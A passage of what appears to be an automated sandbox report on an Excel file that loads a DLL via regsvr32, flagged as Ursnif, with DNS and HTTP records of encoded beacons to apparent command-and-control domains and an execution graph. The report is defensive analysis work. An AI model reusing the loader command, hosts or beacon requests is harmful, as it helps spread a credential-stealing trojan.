                                                                                                                                                                Jun 11, 2021 05:09:26.584979057 CEST53553598.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.241287947 CEST5830653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:27.302783012 CEST53583068.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.481347084 CEST6412453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:27.540366888 CEST53641248.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:28.488085032 CEST4936153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:28.547096014 CEST53493618.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:30.059524059 CEST6315053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:30.118799925 CEST53631508.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:30.536664963 CEST5327953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:30.589927912 CEST53532798.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:48.266587973 CEST5688153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:48.331005096 CEST53568818.8.8.8192.168.2.3

                                                                                                                                                                DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Jun 11, 2021 05:06:40.380889893 CEST | 192.168.2.3 | 8.8.8.8 | 0xe084 | Standard query (0) | quickbooks.aeymotors.com | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:07:34.860609055 CEST | 192.168.2.3 | 8.8.8.8 | 0x1580 | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:08:18.654154062 CEST | 192.168.2.3 | 8.8.8.8 | 0xd547 | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:08:41.880603075 CEST | 192.168.2.3 | 8.8.8.8 | 0xd78b | Standard query (0) | app.bighomegl.at | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:09:05.394586086 CEST | 192.168.2.3 | 8.8.8.8 | 0xdfd3 | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:09:27.481347084 CEST | 192.168.2.3 | 8.8.8.8 | 0xe8d0 | Standard query (0) | app.bighomegl.at | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:09:48.266587973 CEST | 192.168.2.3 | 8.8.8.8 | 0xb1cd | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001) |

                                                                                                                                                                DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jun 11, 2021 05:06:40.458628893 CEST | 8.8.8.8 | 192.168.2.3 | 0xe084 | No error (0) | quickbooks.aeymotors.com | | 50.87.220.158 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:07:35.167087078 CEST | 8.8.8.8 | 192.168.2.3 | 0x1580 | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:07:55.739806890 CEST | 8.8.8.8 | 192.168.2.3 | 0xba06 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) |
| Jun 11, 2021 05:08:18.715344906 CEST | 8.8.8.8 | 192.168.2.3 | 0xd547 | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:08:42.207499027 CEST | 8.8.8.8 | 192.168.2.3 | 0xd78b | No error (0) | app.bighomegl.at | | 185.233.80.31 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:09:05.453524113 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfd3 | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:09:27.540366888 CEST | 8.8.8.8 | 192.168.2.3 | 0xe8d0 | No error (0) | app.bighomegl.at | | 185.233.80.31 | A (IP address) | IN (0x0001) |
| Jun 11, 2021 05:09:48.331005096 CEST | 8.8.8.8 | 192.168.2.3 | 0xb1cd | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001) |

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • authd.feronok.com
                                                                                                                                                                • app.bighomegl.at

                                                                                                                                                                HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.3 | 49732 | 185.233.80.31 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 05:07:35.230685949 CEST | 2298 | OUT | GET /j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszfQOGO_2F/ebssg7ZOH9iTiK1egYa/TYvtl48FqSo7aXNnyk8zDn/0M4_2F1RU9EXO/TpeNu_2B/RPWPT_2BSfoiOaYRvUkNxcz/WR4a1P2fCQ/k1EnQMOdYbM0XsiH2/reukwmEF53hW/xa5HBUgFOAx/sGDiJ22uuBIopz/tZj9wmd1r7z3ANuAYbfIk/bhnJIJVnJvAXbS6_/2Fsif8yHgRIg6fa/a0BPP1Z_2FHpWsn1gk/fe5cFcowW/IKK9U HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
Jun 11, 2021 05:07:35.765377045 CEST | 2298 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:07:35 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.2.3 | 49742 | 185.233.80.31 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 05:08:18.773828030 CEST | 5430 | OUT | GET /c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
Jun 11, 2021 05:08:19.317267895 CEST | 5430 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:08:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49746 | 185.233.80.31 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 05:08:42.281996965 CEST | 5468 | OUT | GET /8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8qE25/AmJwK10jn6MVat3G/t7FuQx2zVw1ffa5/c7cpkHpQnz9kmDbUqx/Otf3v0Da9/dQZioOeK9Dz9hNXsqwu1/tlEzuHEM4S9kJrg9zGq/RjBYXn9MjpOQGxui0wmfPX/po6OMlacqL3xm/d_2FBFj8/AujuAR6DuH05PJMkT_2BTvZ/D_2BlXEdZ3/ZBW_2FuilrCeiWMje/rHsDq9syNU01/kSBqmc5Fyr_/2B3baeMNkKHxqo/p7TsHB_2FsB3Yjr2vV_2F/OiBfbqWQAEP/P_2F HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: app.bighomegl.at
                                                                                                                                                                Connection: Keep-Alive
Jun 11, 2021 05:08:42.816906929 CEST | 5468 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:08:42 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49749 | 185.233.80.31 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 05:09:05.515579939 CEST | 5470 | OUT | GET /Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
Jun 11, 2021 05:09:06.066171885 CEST | 5471 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:09:06 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49757 | 185.233.80.31 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 05:09:27.597299099 CEST | 5843 | OUT | GET /1KWgQnO99/jRkbuys9zmBRLf_2Bfsk/j4hnRgNwvnusz6igqqU/69TUSClHMklgWWKD_2F1Zz/rzeT_2BYOFVhf/cyHjXUJp/RmO3IoI8my48PUoCkU_2Bq5/Szeo_2BZSo/JGYOsrFv3PDanQVBJ/aQVxlvGnm7ma/EvG_2Fcbphd/B7D_2FsJViKTei/G4P6ADPlZ3kryG2o13jPZ/lht8TN_2BF0SOOm1/wlXy9yuuvEg2t5t/0qJz6tISKUfXu3ooK_/2B_2FN_2B/Y8QRyMSJiCCXzc8ct_2F/cWxPiUkWHFklqYWaKgD/HT4v_2FZjRB5pDpaTPvsKl/vHhtteYEDrQEo/F_2BGZVP/fKC323Rf/6 HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                Host: app.bighomegl.at
Jun 11, 2021 05:09:28.119246960 CEST | 6020 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:09:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Content-Length: 548
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jun 11, 2021 05:06:40.844886065 CEST | 50.87.220.158 | 443 | 192.168.2.3 | 49714 | CN=www.quickbooks.aeymotors.com; CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US; CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Apr 14 11:12:56 CEST 2021; Wed Oct 07 21:21:40 CEST 2020 | Tue Jul 13 11:12:56 CEST 2021; Wed Sep 29 21:21:40 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
 | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |

                                                                                                                                                                Code Manipulations

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Start time:05:06:36
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                File size:27110184 bytes
                                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:06:42
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:regsvr32 -s C:/Users/Public/SettingSyncY.dll
                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                File size:20992 bytes
                                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:07:32
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:07:33
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:17
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:17
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:40
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:41
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:09:03
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:05:09:04
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:5.2%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:18.7%
                                                                                                                                                                  Signature Coverage:9.7%
                                                                                                                                                                  Total number of Nodes:843
                                                                                                                                                                  Total number of Limit Nodes:28

                                                                                                                                                                  Graph

15589->15590 15591 67d381d0 15590->15591 15591->15586 15593 67d33986 15592->15593 15594 67d339ac 15592->15594 15593->15574 15596 67d38337 RtlLeaveCriticalSection 15593->15596 15595 67d38337 _doexit RtlLeaveCriticalSection 15594->15595 15595->15593 15596->15577 15597->15580 15599 67d33580 ExitProcess 15598->15599 15600 67d3356e GetProcAddress 15598->15600 15600->15599 15604 67d38337 RtlLeaveCriticalSection 15601->15604 15603 67d35408 15603->15237 15604->15603 15606 67d31687 15605->15606 15607 67d31680 15605->15607 15606->15252 15618 67d31a05 15607->15618 15610 67d37e42 15609->15610 15611 67d37e34 15609->15611 15612 67d30e90 _rand_s 41 API calls 15610->15612 15611->15610 15615 67d37e58 15611->15615 15617 67d37e49 15612->15617 15613 67d2dee7 _rand_s 8 API calls 15614 67d37e53 15613->15614 15614->15261 15615->15614 15616 67d30e90 _rand_s 41 API calls 15615->15616 15616->15617 15617->15613 15619 67d31a11 __CRT_INIT@12 15618->15619 15620 67d31ff5 __write_nolock 41 API calls 15619->15620 15621 67d31a19 15620->15621 15643 67d3192e 15621->15643 15623 67d31a23 15655 67d316cf 15623->15655 15626 67d33a48 __malloc_crt 41 API calls 15627 67d31a45 15626->15627 15638 67d31b72 __CRT_INIT@12 15627->15638 15662 67d31bad 15627->15662 15630 67d31b82 15633 67d31b95 15630->15633 15635 67d33da6 _free 41 API calls 15630->15635 15630->15638 15631 67d31a7b 15632 67d31a9b 15631->15632 15634 67d33da6 _free 41 API calls 15631->15634 15637 67d381ad __lock 41 API calls 15632->15637 15632->15638 15636 67d30e90 _rand_s 41 API calls 15633->15636 15634->15632 15635->15633 15636->15638 15639 67d31aca 15637->15639 15638->15606 15640 67d31b58 15639->15640 15642 67d33da6 _free 41 API calls 15639->15642 15672 67d31b77 15640->15672 15642->15640 15644 67d3193a __CRT_INIT@12 15643->15644 15645 67d31ff5 __write_nolock 41 API calls 15644->15645 15646 67d31944 15645->15646 15647 67d381ad __lock 41 API calls 15646->15647 15653 67d31956 15646->15653 15649 67d31974 15647->15649 15648 67d319a1 15675 67d319cb 
15648->15675 15649->15648 15654 67d33da6 _free 41 API calls 15649->15654 15650 67d336ac __amsg_exit 41 API calls 15652 67d31964 __CRT_INIT@12 15650->15652 15652->15623 15653->15650 15653->15652 15654->15648 15679 67d2c0bb 15655->15679 15658 67d31700 15660 67d31717 15658->15660 15661 67d31705 GetACP 15658->15661 15659 67d316ee GetOEMCP 15659->15660 15660->15626 15660->15638 15661->15660 15663 67d316cf getSystemCP 43 API calls 15662->15663 15664 67d31bca 15663->15664 15667 67d31c1b IsValidCodePage 15664->15667 15669 67d31bd1 setSBCS 15664->15669 15671 67d31c40 _memset __setmbcp_nolock 15664->15671 15665 67d2b899 __output_s_l 6 API calls 15666 67d31a6c 15665->15666 15666->15630 15666->15631 15668 67d31c2d GetCPInfo 15667->15668 15667->15669 15668->15669 15668->15671 15669->15665 15740 67d3179c GetCPInfo 15671->15740 15806 67d38337 RtlLeaveCriticalSection 15672->15806 15674 67d31b7e 15674->15638 15678 67d38337 RtlLeaveCriticalSection 15675->15678 15677 67d319d2 15677->15653 15678->15677 15680 67d2c0cc 15679->15680 15686 67d2c119 15679->15686 15681 67d31ff5 __write_nolock 41 API calls 15680->15681 15682 67d2c0d2 15681->15682 15683 67d2c0f9 15682->15683 15687 67d315ac 15682->15687 15685 67d3192e __setmbcp 41 API calls 15683->15685 15683->15686 15685->15686 15686->15658 15686->15659 15688 67d315b8 __CRT_INIT@12 15687->15688 15689 67d31ff5 __write_nolock 41 API calls 15688->15689 15690 67d315c1 15689->15690 15691 67d315f0 15690->15691 15693 67d315d4 15690->15693 15692 67d381ad __lock 41 API calls 15691->15692 15694 67d315f7 15692->15694 15695 67d31ff5 __write_nolock 41 API calls 15693->15695 15702 67d3162c 15694->15702 15697 67d315d9 15695->15697 15700 67d315e7 __CRT_INIT@12 15697->15700 15701 67d336ac __amsg_exit 41 API calls 15697->15701 15700->15683 15701->15700 15703 67d31637 ___addlocaleref ___removelocaleref 15702->15703 15705 67d3160b 15702->15705 15703->15705 15709 67d313b2 15703->15709 15706 67d31623 15705->15706 15739 67d38337 RtlLeaveCriticalSection 15706->15739 
